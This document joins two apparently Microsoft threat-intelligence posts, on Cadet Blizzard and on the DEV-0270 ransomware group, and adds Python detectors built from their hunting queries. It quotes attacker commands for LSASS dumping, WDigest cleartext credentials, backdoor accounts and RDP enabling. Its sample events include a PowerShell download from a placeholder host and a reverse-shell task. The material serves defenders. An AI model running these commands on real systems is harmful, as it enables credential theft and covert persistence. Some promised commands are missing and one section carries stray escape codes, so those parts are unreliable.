that hid weaponized documents, including OUTSTEEL, that would download onto victims’ machines when the documents are clicked.

## Mitigation and protection guidance

### Defending against Cadet Blizzard

Activities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate from Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.

 * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.
 * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers to download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.
 * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.
 * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.
 * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the large majority of new and unknown variants.

### Hunting for Cadet Blizzard hands-on-keyboard activity

To uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.

**Common commands**

 * _systeminfo_ to fingerprint a device after lateral movement
 * _get-volume_ to fingerprint a device after lateral movement
 * _nslookup_ to research specific devices (IP) and FQDNs internally
 * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace
 * _query session_ to profile RDP connections
 * _route print_ to enumerate routes available on the devices
 * _DownloadFile_ via PowerShell to download payloads from external servers

**Common tool staging directories**

 * _C:\ProgramData_
 * _C:\PerfLogs_
 * _C:\Temp_
 * _C:\_
 * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\Temp_
 * Subdirectories with the name _USOPublic_ in the path

**Common tools**

 * Tor
 * Python
 * Surfshark
 * TeamViewer
 * Meterpreter, named _dbus-rpc.exe_ in known instances
 * IVPN
 * ngrok
 * _GOST.exe_, frequently masked as _USORead.exe_
 * reGeorg web shell

**Indicators of compromise (IOCs)**

IOC| Type| Description
---|---|---
justiceua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_
179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022
3a2a2de20daa74d8f6921230416ed4e6| PE import hash| PE import hash matching WhisperGate malware
3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell – p0wnyshell (not unique to Cadet Blizzard)
20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell – p0wnyshell (not unique to Cadet Blizzard)
3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell – WSO Shell (not unique to Cadet Blizzard)
23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell – reGeorg (not unique to Cadet Blizzard)
7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell – PAS (may not be unique to Cadet Blizzard)

### Microsoft 365 Defender detections

**Microsoft Defender Antivirus**

Microsoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:

 * Behavior:Win32/WmiprvseRemoteProc

Microsoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:

 * WhisperGate

**Microsoft Defender for Endpoint**

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

 * Cadet Blizzard activity detected
 * Possible Storm-0587 activity detected

The following alerts might also indicate threat activity related to this threat.
Note, however, that these alerts can also be triggered by unrelated threat activity.

 * Ongoing hands-on-keyboard attack via Impacket toolkit
 * Suspicious PowerShell command line
 * Suspicious WMI process creation

**Microsoft Defender Vulnerability Management**

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

 * CVE-2021-26084
 * CVE-2020-1472
 * CVE-2021-4034

### Hunting queries

**Microsoft 365 Defender**

Microsoft 365 Defender customers can run the following queries to find related activity in their networks:

Check for WMIExec Impacket activity with common Cadet Blizzard commands

    // cmd.exe spawned by the WMI provider host with wmiexec's 2>&1 redirection,
    // running one of the post-lateral-movement commands listed above
    DeviceProcessEvents
    | where InitiatingProcessFileName =~ "WmiPrvSE.exe" and FileName =~ "cmd.exe"
    | where ProcessCommandLine matches regex "2>&1"
    | where ProcessCommandLine has_any ("get-volume","systeminfo","reg.exe","downloadfile","nslookup","query session","route print")

Find PowerShell file downloads

    // =~ is case-insensitive, so PowerShell.exe and powershell.exe both match
    DeviceProcessEvents
    | where FileName =~ "powershell.exe" and ProcessCommandLine has "DownloadFile"

Scheduled task creation, command execution and C2 communication

    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName =~ "schtasks.exe"
    | where (ProcessCommandLine contains "splservice" or ProcessCommandLine contains "spl32") and
        (ProcessCommandLine contains "127.0.0.1" or ProcessCommandLine contains "2>&1")

### Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with “TI map”) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post-exploitation activity detailed in this blog, in addition to the Microsoft 365 Defender detections listed above.

 * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)
 * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)
 * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)
 * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)
 * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)

### References

 * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>
 * <https://github.com/flozz/p0wny-shell>
 * <https://github.com/sensepost/reGeorg>
 * <https://cert.gov.ua/article/3947787>
 * <https://github.com/fortra/impacket>
 * <https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>

## Further reading

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.

To get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.

The post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).
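The three Microsoft 365 Defender hunting queries from the Cadet Blizzard post above, together with the staging-directory list from its hunting section, re-implemented as an added Python example that runs offline over constructed DeviceProcessEvents-style records. This is editorial example code, not code from the Microsoft post. Assumptions: field names follow the KQL queries; every comparison is case-insensitive, as KQL `=~`, `has_any` and `contains` are; the sample events, host names and the 203.0.113.7 address are constructed; and `%APPDATA%\Temp` is widened to cover both `AppData\Roaming\Temp` and `AppData\Local\Temp`, which the post does not say.

```python
from __future__ import annotations

import re
from datetime import datetime, timedelta, timezone

# Post-lateral-movement commands from the "Check for WMIExec Impacket activity" hunt.
# KQL has_any, =~ and contains are case-insensitive, so everything is compared lower-cased.
CADET_COMMANDS = ("get-volume", "systeminfo", "reg.exe", "downloadfile",
                  "nslookup", "query session", "route print")

# "Common tool staging directories" from the hunting section. %APPDATA% expands to
# AppData\Roaming; AppData\Local\Temp is included too (an assumption, not in the post).
STAGING_ROOTS = (r"c:\programdata", r"c:\perflogs", r"c:\temp")
STAGING_RE = re.compile(r"\\appdata\\(?:roaming|local)\\temp\\|\\usopublic\\", re.I)

# Fixed reference time so the 14-day window of the scheduled-task hunt is reproducible.
EXAMPLE_NOW = datetime(2023, 2, 1, tzinfo=timezone.utc)


def _lc(event: dict, key: str) -> str:
    return str(event.get(key, "")).lower()


def is_wmiexec_cadet(event: dict) -> bool:
    """cmd.exe spawned by WmiPrvSE.exe with the 2>&1 redirection Impacket wmiexec adds,
    running one of the commands Cadet Blizzard issues after lateral movement."""
    cmd = _lc(event, "ProcessCommandLine")
    return (_lc(event, "InitiatingProcessFileName") == "wmiprvse.exe"
            and _lc(event, "FileName") == "cmd.exe"
            and "2>&1" in cmd
            and any(tok in cmd for tok in CADET_COMMANDS))


def is_powershell_download(event: dict) -> bool:
    """powershell.exe invoking WebClient.DownloadFile (the 'Find PowerShell file downloads' hunt)."""
    return (_lc(event, "FileName") == "powershell.exe"
            and "downloadfile" in _lc(event, "ProcessCommandLine"))


def is_reverse_shell_task(event: dict, now: datetime,
                          window: timedelta = timedelta(days=14)) -> bool:
    """schtasks.exe inside the window, naming the splservice/spl32 task and pointing at
    127.0.0.1 or carrying a 2>&1 redirection (the scheduled-task reverse shell hunt)."""
    if _lc(event, "FileName") != "schtasks.exe":
        return False
    if datetime.fromisoformat(event["Timestamp"]) < now - window:
        return False
    cmd = _lc(event, "ProcessCommandLine")
    return ("splservice" in cmd or "spl32" in cmd) and ("127.0.0.1" in cmd or "2>&1" in cmd)


def in_staging_dir(folder_path: str) -> bool:
    """True when a process image lives in one of the listed staging directories.
    The bare drive root C:\\ matches, but not every path beneath it."""
    p = folder_path.lower().replace("/", "\\").rstrip("\\")
    if p == "c:":
        return True
    if any(p == root or p.startswith(root + "\\") for root in STAGING_ROOTS):
        return True
    return STAGING_RE.search(p + "\\") is not None


RULES = (
    ("wmiexec_cadet_commands", lambda ev, now: is_wmiexec_cadet(ev)),
    ("powershell_downloadfile", lambda ev, now: is_powershell_download(ev)),
    ("scheduled_task_reverse_shell", is_reverse_shell_task),
    ("tool_in_staging_dir", lambda ev, now: in_staging_dir(ev.get("FolderPath", ""))),
)


def hunt(events: list[dict], now: datetime | None = None) -> list[tuple[str, str, str]]:
    """Run every rule over DeviceProcessEvents-style records; return (rule, device, command line)."""
    now = now or datetime.now(timezone.utc)
    return [(name, ev["DeviceName"], ev["ProcessCommandLine"])
            for ev in events for name, rule in RULES if rule(ev, now)]


# Constructed sample telemetry: one intrusion on srv-ua-01, benign noise and a stale task on ws-fin-07.
SAMPLE_EVENTS = [
    {"Timestamp": "2023-01-28T09:15:00+00:00", "DeviceName": "srv-ua-01",
     "InitiatingProcessFileName": "WmiPrvSE.exe", "FileName": "cmd.exe",
     "FolderPath": r"C:\Windows\System32",
     "ProcessCommandLine": r"cmd.exe /Q /c powershell get-volume 1> \\127.0.0.1\ADMIN$\__1674897300.41 2>&1"},
    {"Timestamp": "2023-01-28T09:16:10+00:00", "DeviceName": "srv-ua-01",
     "InitiatingProcessFileName": "cmd.exe", "FileName": "powershell.exe",
     "FolderPath": r"C:\Windows\System32\WindowsPowerShell\v1.0",
     "ProcessCommandLine": "powershell -nop -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.7/USORead.exe','C:\\PerfLogs\\USORead.exe')\""},
    {"Timestamp": "2023-01-28T09:17:45+00:00", "DeviceName": "srv-ua-01",
     "InitiatingProcessFileName": "cmd.exe", "FileName": "schtasks.exe",
     "FolderPath": r"C:\Windows\System32",
     "ProcessCommandLine": r'schtasks /create /tn splservice /sc onstart /ru SYSTEM /tr "C:\PerfLogs\USORead.exe -L :4444 2>&1"'},
    {"Timestamp": "2023-01-28T09:18:02+00:00", "DeviceName": "srv-ua-01",
     "InitiatingProcessFileName": "svchost.exe", "FileName": "USORead.exe",
     "FolderPath": r"C:\PerfLogs",
     "ProcessCommandLine": r"C:\PerfLogs\USORead.exe -L :4444"},
    {"Timestamp": "2023-01-29T14:00:00+00:00", "DeviceName": "ws-fin-07",
     "InitiatingProcessFileName": "explorer.exe", "FileName": "cmd.exe",
     "FolderPath": r"C:\Windows\System32",
     "ProcessCommandLine": "cmd.exe /c systeminfo"},
    {"Timestamp": "2022-11-01T08:00:00+00:00", "DeviceName": "ws-fin-07",   # outside the 14-day window
     "InitiatingProcessFileName": "cmd.exe", "FileName": "schtasks.exe",
     "FolderPath": r"C:\Windows\System32",
     "ProcessCommandLine": "schtasks /create /tn spl32 /tr C:\\Temp\\a.bat 2>&1"},
]

if __name__ == "__main__":
    for rule, device, cmdline in hunt(SAMPLE_EVENTS, EXAMPLE_NOW):
        print(f"{rule:30} {device:10} {cmdline}")
```

Running it prints the four hits on srv-ua-01 only: the staging-directory rule is what catches the renamed GOST binary after the first three rules have already exposed the wmiexec session, the download and the task. The `systeminfo` launch from Explorer and the two-month-old `spl32` task stay silent, which is the point of keeping the `WmiPrvSE.exe` parent and the `ago(14d)` window in the rules rather than matching on command names alone.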
_Microsoft Security Blog post (mssecure feed), last seen 2022-09-07._

Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270’s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaig. We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270’s operations.

DEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBins) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.

In some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys.
In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data from the organization for sale, packaged as an SQL database dump.

Using these observations, this blog details the group’s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.

Figure 1. Typical DEV-0270 attack chain

## Who is DEV-0270?

Microsoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. These organizations are also linked to Najee Technology Hooshmand (ناجی تکنولوژی هوشمند), located in Karaj, Iran.

The group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.

As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing the Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

## Observed actor activity

### Initial access

In many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon; this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.

### Discovery

Upon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>) _computersystem get domain_ obtains the target’s domain name. The _whoami_ command displays the identity of the current user, and _net user_ enumerates local accounts (with _/add_ it also creates or modifies them). For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.

 * wmic computersystem get domain
 * whoami
 * net user

On the compromised Exchange server, the actor used the following command to understand the target environment.

    Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders

For discovery of domain controllers, the actor used the following PowerShell and WMI command.

### Credential access

DEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which makes LSASS keep cleartext passwords in memory for logons that occur after the change and saves the actor the time of cracking a password hash.

    "reg" add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

The actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. The file name is also reversed to evade detections (_ssasl.dmp_):

### Persistence

To maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount_ with a password of _P@ssw0rd1234_, to the device using the command _net user /add_. The _DefaultAccount_ account is typically a pre-existing account set up but not enabled on most Windows systems.

The attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the Remote Desktop Users group:

    "reg" add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f

    "reg" add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

    "reg" add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD

    "netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389

Scheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.

Figure 2. Scheduled task used in DEV-0270 attacks

### Privilege escalation

DEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. When the group uses Impacket’s WMIExec to move laterally to other systems on the network, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.

Another form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the Administrators group for higher privileges.

### Defense evasion

DEV-0270 uses a handful of defense evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate into the local certificate store. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.

Additionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.

### Lateral movement

DEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.

Along with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)’s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.

An example of a command using Impacket’s WMIExec from a remote device:

    cmd.exe /Q /c quser 1> \\127.0.0.1\ADMIN$\__1657130354.2207212 2>&1

### Impact

DEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device's entire hard drive. The group drops _DiskCryptor_ from an RDP session and, when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.

The following are DEV-0270’s PowerShell commands using BitLocker:

Microsoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers.
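The registry, `netsh`, `net` and `rundll32` command lines quoted in the Credential access, Persistence and Privilege escalation sections above, turned into an added Python detector that parses process-creation command lines and tags the DEV-0270 stage each one represents, including the reversed `ssasl.dmp` file name. This is editorial example code, not Microsoft's; the sample command lines beyond those on the page, the device names EXCH01 and WS07 and the LSASS PID 712 are constructed. It deliberately flags only the weakening direction of each registry change (WDigest on, RDP denial off, NLA off or unset), so hardening scripts that set the opposite values do not fire it.

```python
from __future__ import annotations

import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Command-line shapes from the DEV-0270 sections above. Matching is case-insensitive
# because cmd.exe, reg.exe and net.exe are; "reg" may appear quoted, as in the post.
REG_ADD_RE = re.compile(
    r'^"?reg(?:\.exe)?"?\s+add\s+(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))(?P<rest>.*)$', re.I)
NET_USER_RE = re.compile(
    r'^"?net1?(?:\.exe)?"?\s+user\s+(?P<name>[^/\s]+)\s+(?:\S+\s+)?(?P<flag>/add|/active:yes)', re.I)
NET_GROUP_RE = re.compile(
    r'^"?net1?(?:\.exe)?"?\s+localgroup\s+(?:"(?P<qgroup>[^"]+)"|(?P<group>\S+))\s+\S+\s+/add', re.I)
MINIDUMP_RE = re.compile(r'minidump\s+\d+\s+(?:"(?P<qpath>[^"]+)"|(?P<path>\S+))', re.I)


def parse_reg_add(cmd: str) -> dict | None:
    """Split a `reg add <key> /v <name> /t <type> /d <data>` line into key, value name and data."""
    m = REG_ADD_RE.match(cmd.strip())
    if not m:
        return None
    rest = m.group("rest")

    def opt(flag: str) -> str | None:
        mm = re.search(rf"/{flag}\s+(\S+)", rest, re.I)
        return mm.group(1) if mm else None

    return {"key": (m.group("qkey") or m.group("key")).rstrip("\\"),
            "value": opt("v"), "data": opt("d")}


def classify(cmd: str) -> str | None:
    """Return the DEV-0270 stage a command line represents, or None when it matches nothing."""
    c = cmd.strip()
    low = c.lower()
    reg = parse_reg_add(c)
    if reg:
        key = reg["key"].lower()
        val = (reg["value"] or "").lower()
        data = reg["data"]
        if key.endswith(r"securityproviders\wdigest") and val == "uselogoncredential" and data == "1":
            return "credential_access:wdigest_cleartext"
        if r"control\terminal server" in key and (
                (val == "fdenytsconnections" and data == "0")
                or (val == "tsenabled" and data == "1")
                or (val == "userauthentication" and data != "1")):   # NLA turned off or left unset
            return "persistence:rdp_enabled"
        return None
    if "comsvcs.dll" in low and "minidump" in low:
        return "credential_access:lsass_dump"
    if "advfirewall" in low and "add rule" in low and "localport=3389" in low and "action=allow" in low:
        return "persistence:rdp_firewall_rule"
    if NET_USER_RE.match(c):
        return "persistence:account_added_or_enabled"
    m = NET_GROUP_RE.match(c)
    if m and (m.group("qgroup") or m.group("group")).lower() in ("administrators", "remote desktop users"):
        return "privilege_escalation:group_membership"
    return None


def dump_target(cmd: str) -> str | None:
    """Output path of a comsvcs.dll MiniDump invocation (`MiniDump <pid> <path> full`)."""
    m = MINIDUMP_RE.search(cmd)
    return (m.group("qpath") or m.group("path")) if m else None


def is_reversed_lsass_name(path: str) -> bool:
    """True for dump files named by spelling 'lsass' backwards, e.g. ssasl.dmp."""
    return PureWindowsPath(path).stem.lower()[::-1] == "lsass"


def summarize(events: list[dict]) -> dict[str, list[str]]:
    """Map each device to the sorted set of stages seen in its process command lines."""
    stages: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        cmd, dev = ev["ProcessCommandLine"], ev["DeviceName"]
        stage = classify(cmd)
        if stage:
            stages[dev].add(stage)
        if stage == "credential_access:lsass_dump":
            target = dump_target(cmd)
            if target and is_reversed_lsass_name(target):
                stages[dev].add("defense_evasion:reversed_dump_name")
    return {dev: sorted(s) for dev, s in stages.items()}


# Constructed sample: the command lines quoted in the post (with a constructed PID and dump
# path) on EXCH01, plus two benign lines on WS07 that must not fire.
SAMPLE_EVENTS = [
    {"DeviceName": "EXCH01", "ProcessCommandLine":
     r'"reg" add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f'},
    {"DeviceName": "EXCH01", "ProcessCommandLine":
     r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Temp\ssasl.dmp full"},
    {"DeviceName": "EXCH01", "ProcessCommandLine": "net user DefaultAccount P@ssw0rd1234 /add"},
    {"DeviceName": "EXCH01", "ProcessCommandLine": 'net localgroup "Remote Desktop Users" DefaultAccount /add'},
    {"DeviceName": "EXCH01", "ProcessCommandLine":
     r'"reg" add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0'},
    {"DeviceName": "EXCH01", "ProcessCommandLine":
     '"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389'},
    {"DeviceName": "WS07", "ProcessCommandLine": r"reg add HKCU\Software\Contoso /v Setting /t REG_SZ /d hello /f"},
    {"DeviceName": "WS07", "ProcessCommandLine": "net user"},
]

if __name__ == "__main__":
    for device, seen in summarize(SAMPLE_EVENTS).items():
        print(device, seen)
```

On the sample, EXCH01 accumulates seven distinct tags across credential access, persistence, privilege escalation and defense evasion, while WS07 produces none: a plain `reg add` under HKCU and a bare `net user` enumeration are not flagged. In practice the value is the combination per device within a short window; any one of these commands alone is routine administration.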
The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don't have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. 
